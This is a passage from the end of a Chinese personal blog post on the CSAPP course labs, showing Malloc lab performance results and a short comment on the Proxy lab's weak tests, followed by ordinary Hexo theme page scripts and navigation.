<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">Results for mm malloc:</span><br><span class="line">trace  valid  util     ops      secs  Kops</span><br><span class="line"> 0       yes   99%    5694  0.000310 18362</span><br><span class="line"> 1       yes  100%    5848  0.000275 21265</span><br><span class="line"> 2       yes   99%    6648  0.000359 18544</span><br><span class="line"> 3       yes  100%    5380  0.000269 20015</span><br><span class="line"> 4       yes   98%   14400  0.000339 42428</span><br><span class="line"> 5       yes   96%    4800  0.000526  9122</span><br><span class="line"> 6       yes   95%    4800  0.000563  8518</span><br><span class="line"> 7       yes   97%    6000  0.003398  1766</span><br><span class="line"> 8       yes   90%    7200  0.004601  1565</span><br><span class="line"> 9       yes  100%   14401  0.000300 48083</span><br><span class="line">10       yes   87%   14401  0.000344 41839</span><br><span class="line">Total          96%   89572  0.011284  7938</span><br><span class="line"></span><br><span class="line">Perf index = 58 (util) + 40 (thru) = 98/100</span><br></pre></td></tr></table></figure>

<p>Without hard-coded strategy:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">Results for mm malloc:</span><br><span class="line">trace  valid  util     ops      secs  Kops</span><br><span class="line"> 0       yes   99%    5694  0.000426 13382</span><br><span class="line"> 1       yes  100%    5848  0.000387 15127</span><br><span class="line"> 2       yes   99%    6648  0.000461 14424</span><br><span class="line"> 3       yes  100%    5380  0.000421 12782</span><br><span class="line"> 4       yes   98%   14400  0.000517 27842</span><br><span class="line"> 5       yes   96%    4800  0.000777  6174</span><br><span class="line"> 6       yes   95%    4800  0.000937  5124</span><br><span class="line"> 7       yes   55%    6000  0.000370 16216</span><br><span class="line"> 8       yes   51%    7200  0.000551 13072</span><br><span class="line"> 9       yes  100%   14401  0.000412 34971</span><br><span class="line">10       yes   87%   14401  0.000422 34101</span><br><span class="line">Total          89%   89572  0.005680 15769</span><br><span class="line"></span><br><span class="line">Perf index = 53 (util) + 40 (thru) = 93/100</span><br></pre></td></tr></table></figure>

<h2 id="Proxy-lab"><a href="#Proxy-lab" class="headerlink" title="Proxy lab"></a>Proxy lab</h2><p>模拟即可。这个实验挺有用，可以在自己浏览器里跑！但是测试数据很弱……不会检查 file descriptor 泄漏，不会检查 SIGPIPE 的处理之类的。</p>

      
    </div>

    

    
    
    

    

    
      
    
    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%B3%BB%E7%BB%9F/" rel="tag"><i class="fa fa-tag"></i> 计算机系统</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/03/26/Link-Cut-Tree-%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" rel="next" title="Link Cut Tree 学习笔记">
                <i class="fa fa-chevron-left"></i> Link Cut Tree 学习笔记
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/09/09/Petrozavodsk-Camp-Summer-2020-%E6%B8%B8%E8%AE%B0/" rel="prev" title="Petrozavodsk Camp Summer 2020 游记">
                Petrozavodsk Camp Summer 2020 游记 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  
    <div class="comments" id="gitalk-container">
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Distant Yesterday</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/%20%7C%7C%20archive">
                
                    <span class="site-state-item-count">24</span>
                    <span class="site-state-item-name">日志</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">8</span>
                    <span class="site-state-item-name">分类</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-tags">
                  <a href="/tags/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">22</span>
                    <span class="site-state-item-name">标签</span>
                  </a>
                </div>
              
            </nav>
          

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <a href="https://codeforces.com/profile/DistantYesterday" title="Codeforces &amp;rarr; https:&#x2F;&#x2F;codeforces.com&#x2F;profile&#x2F;DistantYesterday" rel="noopener" target="_blank">&lt;i class&#x3D;&quot;fa fa-fw fa-code&quot;&gt;&lt;&#x2F;i&gt;Codeforces</a>
                </span>
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <a href="https://github.com/YangDong02" title="GitHub &amp;rarr; https:&#x2F;&#x2F;github.com&#x2F;YangDong02" rel="noopener" target="_blank">&lt;i class&#x3D;&quot;fa fa-fw fa-github&quot;&gt;&lt;&#x2F;i&gt;GitHub</a>
                </span>
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <a href="https://atcoder.jp/users/YangDavid" title="AtCoder &amp;rarr; https:&#x2F;&#x2F;atcoder.jp&#x2F;users&#x2F;YangDavid" rel="noopener" target="_blank">&lt;i class&#x3D;&quot;fa fa-fw fa-adn&quot;&gt;&lt;&#x2F;i&gt;AtCoder</a>
                </span>
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <a href="https://www.luogu.org/space/show?uid=51990" title="洛谷 &amp;rarr; https:&#x2F;&#x2F;www.luogu.org&#x2F;space&#x2F;show?uid&#x3D;51990" rel="noopener" target="_blank">&lt;i class&#x3D;&quot;fa fa-fw fa-leaf&quot;&gt;&lt;&#x2F;i&gt;洛谷</a>
                </span>
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <a href="https://lydsy.com/JudgeOnline/userinfo.php?user=YangDong2002" title="BZOJ &amp;rarr; https:&#x2F;&#x2F;lydsy.com&#x2F;JudgeOnline&#x2F;userinfo.php?user&#x3D;YangDong2002" rel="noopener" target="_blank">&lt;i class&#x3D;&quot;fa fa-fw fa-globe&quot;&gt;&lt;&#x2F;i&gt;BZOJ</a>
                </span>
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <a href="https://cn.vjudge.net/user/Yangdong" title="vjudge &amp;rarr; https:&#x2F;&#x2F;cn.vjudge.net&#x2F;user&#x2F;Yangdong" rel="noopener" target="_blank">&lt;i class&#x3D;&quot;fa fa-fw fa-power-off&quot;&gt;&lt;&#x2F;i&gt;vjudge</a>
                </span>
              
            </div>
          

          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://bytew.net/" title="http:&#x2F;&#x2F;bytew.net&#x2F;" rel="noopener" target="_blank">nocriz</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://hdmmblz.github.io/" title="https:&#x2F;&#x2F;hdmmblz.github.io&#x2F;" rel="noopener" target="_blank">HDMMBLZ</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://thelajiest.github.io/" title="https:&#x2F;&#x2F;thelajiest.github.io&#x2F;" rel="noopener" target="_blank">KON_automaton</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://blog.csdn.net/m0_37809890" title="https:&#x2F;&#x2F;blog.csdn.net&#x2F;m0_37809890" rel="noopener" target="_blank">LittleFall</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://sheauhawjang.github.io/" title="https:&#x2F;&#x2F;sheauhawjang.github.io&#x2F;" rel="noopener" target="_blank">Sheauhaw</a>
                  </li>
                
              </ul>
            </div>
          

          
            
          
          

        </div>
      </div>

      
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%AF%BE%E7%A8%8B"><span class="nav-number">1.</span> <span class="nav-text">课程</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-2-3-%E7%AB%A0"><span class="nav-number">1.1.</span> <span class="nav-text">1,2,3 章</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#5-6-%E7%AB%A0"><span class="nav-number">1.2.</span> <span class="nav-text">5,6 章</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#7-8-9-%E7%AB%A0"><span class="nav-number">1.3.</span> <span class="nav-text">7,8,9 章</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#10-11-12-%E7%AB%A0"><span class="nav-number">1.4.</span> <span class="nav-text">10,11,12 章</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%AE%9E%E9%AA%8C"><span class="nav-number">2.</span> <span class="nav-text">实验</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Data-lab"><span class="nav-number">2.1.</span> <span class="nav-text">Data lab</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Bomb-lab"><span class="nav-number">2.2.</span> <span class="nav-text">Bomb lab</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Attack-lab"><span class="nav-number">2.3.</span> <span class="nav-text">Attack lab</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Cache-lab"><span class="nav-number">2.4.</span> <span class="nav-text">Cache lab</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Shell-lab"><span class="nav-number">2.5.</span> <span class="nav-text">Shell lab</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Malloc-lab"><span class="nav-number">2.6.</span> <span class="nav-text">Malloc lab</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Proxy-lab"><span class="nav-number">2.7.</span> <span class="nav-text">Proxy lab</span></a></li></ol></li></ol></div>
            

          </div>
        </div>
      <!--/noindex-->
      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
            <span id="scrollpercent"><span>0</span>%</span>
          
        </div>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2024</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Distant Yesterday</span>

  

  
</div>


  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v5.4.2</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 – <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> v7.0.0</div>




        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="post-meta-item-icon">
      <i class="fa fa-user"></i>
    </span>
    <span class="site-uv" title="总访客量">
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
    </span>
  

  
    <span class="post-meta-divider">|</span>
  

  
    <span class="post-meta-item-icon">
      <i class="fa fa-eye"></i>
    </span>
    <span class="site-pv" title="总访问量">
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
    </span>
  
</div>









        
      </div>
    </footer>

    

    

    

    
  </div>

  

<script>
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  <script src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>


  


  <script src="/js/src/utils.js?v=7.0.0"></script>

  <script src="/js/src/motion.js?v=7.0.0"></script>



  
  


  <script src="/js/src/affix.js?v=7.0.0"></script>

  <script src="/js/src/schemes/pisces.js?v=7.0.0"></script>




  
  <script src="/js/src/scrollspy.js?v=7.0.0"></script>
<script src="/js/src/post-details.js?v=7.0.0"></script>



  


  <script src="/js/src/bootstrap.js?v=7.0.0"></script>



  


  
    

<script src="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js"></script>



<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.css"/>



<script src="//cdn.jsdelivr.net/npm/js-md5@0.7.3/src/md5.min.js"></script>

<script>
  var gitalk = new Gitalk({
    clientID: 'e0e339695a1d1c07b011',
    clientSecret: '67dee24f0d0add7a9b8d597e6acca375df7dc06e',
    repo: 'yangdong02.github.io',
    owner: 'YangDong02',
    admin: ['YangDong02'],
    id: md5(location.pathname),
    distractionFreeMode: ''
  });
  gitalk.render('gitalk-container');
</script>

  


  
  <script>
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url).replace(/\/{2,}/g, '/');
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x"></i></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x"></i></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  
  

  
  

  
    
      <script type="text/x-mathjax-config">
  

  MathJax.Hub.Config({
    tex2jax: {
      inlineMath: [ ['$','$'], ["\\(","\\)"] ],
      processEscapes: true,
      skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    },
    TeX: {
      
      equationNumbers: {
        autoNumber: "AMS"
      }
    }
  });
</script>

<script type="text/x-mathjax-config">
  MathJax.Hub.Queue(function() {
    var all = MathJax.Hub.getAllJax(), i;
      for (i = 0; i < all.length; i += 1) {
        all[i].SourceElement().parentNode.className += ' has-jax';
      }
  });
</script>
<script src="//cdn.jsdelivr.net/npm/mathjax@2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>

<style>
.MathJax_Display {
  overflow: auto hidden;
}
</style>

    
  


  

  

  

  

  

  

  

  

  
  
  
  <script src="/lib/bookmark/bookmark.min.js?v=1.0"></script>
  <script>
  
    bookmark.scrollToMark('auto', "#更多");
  
  </script>


  
  <style>
    .copy-btn {
      display: inline-block;
      padding: 6px 12px;
      font-size: 13px;
      font-weight: 700;
      line-height: 20px;
      color: #333;
      white-space: nowrap;
      vertical-align: middle;
      cursor: pointer;
      background-color: #eee;
      background-image: linear-gradient(#fcfcfc, #eee);
      border: 1px solid #d5d5d5;
      border-radius: 3px;
      user-select: none;
      outline: 0;
    }

    .highlight-wrap .copy-btn {
      transition: opacity .3s ease-in-out;
      opacity: 0;
      padding: 2px 6px;
      position: absolute;
      right: 4px;
      top: 8px;
    }

    .highlight-wrap:hover .copy-btn,
    .highlight-wrap .copy-btn:focus {
      opacity: 1
    }

    .highlight-wrap {
      position: relative;
    }
  </style>
  <script>
    $('.highlight').each(function(i, e) {
      var $wrap = $('<div>').addClass('highlight-wrap');
      $(e).after($wrap);
      $wrap.append($('<button>').addClass('copy-btn').append('复制').on('click', function(e) {
        var code = $(this).parent().find('.code').find('.line').map(function(i, e) {
          return $(e).text();
        }).toArray().join('\n');
        var ta = document.createElement('textarea');
        var range = document.createRange(); //For Chrome
        var sel = window.getSelection(); //For Chrome
        var yPosition = window.pageYOffset || document.documentElement.scrollTop;
        ta.style.top = yPosition + 'px'; //Prevent page scroll
        ta.style.position = 'absolute';
        ta.style.opacity = '0';
        ta.value = code;
        ta.textContent = code; //For FireFox
        ta.contentEditable = true;
        ta.readOnly = false;
        document.body.appendChild(ta);
        range.selectNode(ta);
        sel.removeAllRanges();
        sel.addRange(range);
        ta.setSelectionRange(0, code.length);
        var result = document.execCommand('copy');
        
          if (result) $(this).text('复制成功');
          else $(this).text('复制失败');
        
        ta.blur(); //For iOS
        $(this).blur();
      })).on('mouseleave', function(e) {
        var $b = $(this).find('.copy-btn');
        setTimeout(function() {
          $b.text('复制');
        }, 300);
      }).append(e);
    })
  </script>


</body>
</html>
